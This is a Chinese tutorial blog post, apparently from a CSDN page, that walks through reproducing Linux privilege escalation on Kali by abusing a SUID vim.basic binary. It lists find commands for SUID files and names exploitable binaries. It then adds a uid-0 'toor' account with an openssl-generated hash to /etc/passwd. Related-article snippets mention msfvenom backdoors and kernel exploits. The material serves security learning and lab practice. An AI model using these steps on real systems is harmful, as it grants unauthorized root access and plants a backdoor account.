linux防范文件提权,Linux使用suid vim.basic文件实现提权

最新推荐文章于 2022-12-03 19:09:15 发布
最新推荐文章于 2022-12-03 19:09:15 发布
阅读量145 收藏
点赞数
文章标签: linux防范文件提权

在kali上复现

先给需要的vim.basic文件设置suid权限

chmod u+s /usr/bin/vim.basic

先adduser test1一个普通权限用户

现在就是一个合适的提权环境

通过以下命令可以找到存在suid权限的文件

find / -user root -perm -4000 -print 2>/dev/null

find / -perm -u=s -type f 2>/dev/null

find / -user root -perm -4000 -exec ls -ldb {} \;

可用于提权的文件有

nmap

vim

find

bash

more

less

nano

cp

1-200I1223Z7.png

利用vim提权的思路是修改etc/passwd文件,为自己添加一个有root权限的用户

passwd文件用户格式为:用户名:密码:uid:gid:注释:home目录:用户的shell

这边可以看看root用户的格式

root:x:0:0:root:/root:/bin/bash

(密码这部分之所以是x,是因为真正的密码存在/etc/shadow文件里)

1-200I1223Z7-50.png

生成密码:用openssl passwd -1 –salt asd 123 (这里是-1(数字1)不是L)

直接写在passwd文件里面,

1-200I1223Z7-51.png

toor:$1$asd$sTMDZlRI6L.jJEw2I.3x8.:0:0:root:/toor:/bin/bash

用vim /etc/passwd可以修改,但是在保存是会出现E212,无法保存,提示我们没有权限修改这个

1-200I1223Z8.png

这时应该用之前find找到的vim.basic文件运行,这个程序是有suid权限的。绝对可以修改

vim.basic /etc/passwd

用这个打开,然后修改文件,就可以成功保存

1-200I1223Z8-50.png

可以看到已经添加了,su toor切换,密码123,再id查看一下权限

1-200I1223Z8-51.png

root权限

chmod u+s /usr/bin/vim.basic

以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持服务器之家。

原文链接:https://www.cnblogs.com/This-is-Y/p/13211224.html

碗丸
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
linux内核 攻击,针对Linux内核提权攻击防御方法的研究
weixin_39559895的博客
04-30 338
摘要:本文提出了一种基于Intel SMEP的轻量级的内核控制流完整性防御方法,以防御exploit-db中常见的内核提权攻击。该方案通过分离内核钩子函数的解引用和验证操作,在解引用处记录钩子函数,在敏感函数内验证钩子函数是否合法,防止恶意进程利用内核代码漏洞,修改全局函数钩子,导致内核中的敏感代码被恶意执行。关键词:Linux内核 SMEP 提权攻击中图分类号:TP393 文献标识码:A 文章编...
linux防黑工具,服务器防黑加固丨Linux提权的4种方式,你知道几个
weixin_39706491的博客
05-10 194
原标题:服务器防黑加固丨Linux提权的4种方式,你知道几个当你在攻击受害者的电脑时即使你拥有了一个shell,依然可能会有一些拒绝执行指令的限制。为了获得目标主机的完整控制权限,你需要在未授权的地方绕过权限控制。这些权限可以删除文件,浏览私人信息,或者安装并非受害者希望的软件例如计算机病毒。Metasploit 拥有各种使用不同技术的exploits在受害者电脑上尝试获取系统级权限。除此之外,这...
linux 程序提权,Linux提权辅助工具
weixin_39699313的博客
05-01 270
前几天有朋友问我找exp,其实有一个很好的程序可以检索你所需的exp--Linux_Exploit_Suggester我记得很多地方也有这款工具的介绍。这款工具也可以看到你当前系统的内核版本。root@Wing:~/Linux-exp# ./Linux-exp.plKernel local: 3.12.Searching among 64 exploits...Possible Exploits:...
linux防范文件提权,Linux系统容易受到X.Org服务器中的权限提升和文件覆盖漏洞攻击...
weixin_42315341的博客
04-29 131
X.Org服务器中的“不正确的命令行参数验证”漏洞使得可以升级权限以及覆盖文件。 该问题影响使用开源X Window System实现Linux和BSD发行版。这种脆弱性已存在了几年,但已被安全研究人员Narendra Shinde曝光。 如果X服务器以提升的权限运行,则非root用户可以利用未修补的系统。发布到X.Org邮件列表的安全建议解释说:“当X服务器以提升的权限运行时(即,当Xorg ...
Linux使用suid vim.basic文件实现提权
09-14
本篇文章将重点讨论如何通过SUID的`vim.basic`文件实现提权。 首先,我们要确保有一个SUID权限的`vim.basic`文件。在Kali Linux系统中,我们可以使用`chmod`命令来添加这个权限: ```bash chmod u+s /usr/bin/...
Linux提权手法总结以及 Linux提权exp集合
02-22
本文将深入探讨Linux提权的常见手法,以及如何防范和应对这些威胁。 首先,内核漏洞提权是最直接也最具破坏性的方式之一。当Linux内核存在安全漏洞时,攻击者可以利用这些漏洞执行恶意代码,从而获得root权限。例如...
Linux提权扫描脚本
最新发布
04-28
这篇文档将深入探讨Linux提权扫描的相关知识点,包括提权原理、常见提权方法、提权扫描脚本的工作机制以及如何编写和使用这样的脚本。 一、提权原理 在Linux系统中,权限分为三类:用户权限、组权限和所有者权限。...
linux提权总结8大类型,30多种方式
09-27
linux提权总结8大类型,30多种方式 小白也能看明白的提权方法,包括内核提权,服务提权 sudo提权 suid提权sgid提权 定时任务提权 nfs提权 等待
服务器运维|linux系统锁定关键系统文件防止提权篡改
数字化小李的博客
12-03 584
服务器的运维中个,linux系统锁定关键系统文件防止提权篡改尤其重要。简单操作如下:/上锁:[root@muban ~]# chattr +i /etc/passwd /etc/shadow /etc/group /etc/gshadow /etc/inittab/解锁:[root@muban ~]# chattr -i /etc/passwd /etc/shadow /etc/group /etc/gshadow /etc/inittab
Linux命令sudo实现集权(提权)管理,防止超级权限泛滥
weixin_34235105的博客
05-10 435
sudo小结1、别名要用大写2、使用“\”换行3、使用白名单策略,尽量不要赋予ALL权限(建议先关后开)4、禁止的权限放在最后,允许的权限放在前面,sudoers配置文件的权限匹配时从后到前的5、成员必须是存在的(用户必须存在)6、“!”表示禁止权限7、命令、组员、组等,用“,”分隔开(英文逗号)8、组前面一定要带“%” su命令缺点1、普通用户需要知道root密码,并且切换到root用户下,才能...
linux利用* vim提权,linux 通过suid vim.basic文件提权
weixin_36080939的博客
05-14 791
在kali上复现先给需要的vim.basic文件设置suid权限chmod u+s /usr/bin/vim.basic先adduser test1一个普通权限用户现在就是一个合适的提权环境通过以下命令可以找到存在suid权限的文件find / -user root -perm -4000 -print 2>/dev/nullfind / -perm -u=s -type f 2>/d...
Linux基本防护和用户切换与提权
dupeng86的博客
09-24 291
用户账号安全 设置账号有效期 使用chage工具 -d 0,强制修改密码 -E yyyy-mm-dd,制定失效日期(-1quxiao) ]# chage -E 2019-12-31 zengye ]# chage -l zengye .. .. Password inactive :never Account expires :Dec 31,2017 .. .. 账号的锁定/解锁...
LinuxSUID提权
Zlirving_的博客
08-25 774
0x00 SUID是什么? SUID其实和文件或目录的基本属性一样(r w x) ,当一个可执du行的文件(命令)拥有SUID时,x就变成s了,你试下:ll /usr/bin/passwd 就知道,意思就是当你执行这个命令时暂时拥有passwd的拥有者的权限,也就是root   0x01 suid提权 运行某些程序时暂时获得root的权限,例如ping(socket需要root才能运行) 搜索符合条件的可以用来提权的:(三种都可以) find / -perm -u=s -type f 2>/
系统渗透与防护——后门植入与SUID提权
m0_60643467的博客
10-09 1932
Msfvenom Msfvenom是MSF框架配套的攻击载荷生成器,可以用来生成木马程序,并在目标机上执行,在本地监听上线。 部分参数 -p:选择一个载荷 -f:生成的文件格式 -lhost:监听地址 -lport:监听端口 -o:输入文件名 -h:帮助 Msfvenom实验测试 Msfvenom生成后门文件 第一步,在kali生成后门文件 第二步,开启Linux靶机的root用户,并设置密码 上传后门文件至靶机 第三步,在kali中将后门文件发送到目标主机 在
linux提权与权限维持
gugonggugong的博客
01-24 390
一、Linux提权 1. 内核提权 之脏牛漏洞提权 脏牛漏洞,又叫Dirty COW,存在Linux内核中已经有长达9年的时间,在2007年发布的Linux内核版本中就已经存在此漏洞。Linux kernel团队在2016年10月18日已经对此进行了修复。 漏洞范围:Linux内核 >= 2.6.22(2007年发行,到2016年10月18日才修复) 简要分析:该漏洞具体为,Linux内核的内存子系统在处理写入复制(copy-on-write, COW)时产生了竞争条...
Linux配置不当提权-suid提权
孤的博客
09-14 1637
攻击成功,并得到一个shell,但是这里却只是一个简单的shell,首先需要把它转换为一个交互式的shell 在简单shell中直接按删除键是不行的,要按住ctrl键之后,再按住删除键才可以,其他键的使用也一样 命令 python -c 'import pty;pty.spawn("/bin/bash")' 现在已经进入了一个交互的shell了,但是可以看到这只是一个普通的用户,所以我们要把他提...
Unix /ubuntu 下装vim编辑器 和简单使用
en&ha
09-03 1787
 一 vim编辑器   1.vim编辑器简介     vim编辑器是Unix系统最初的编辑器。它使用控制台图形模式来模拟文本编辑窗口,允许查看文件中的行、在文件中移动、插入、编辑和替换文本。  2.检查vim软件包    在开始研究vim编辑器之前,最好先搞明白你用的Linux系统是哪种vim软件包。在有些发行版本中安装的是完整的vim,另外还有一个vi命令的别名,就像下面所显示的Cent...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值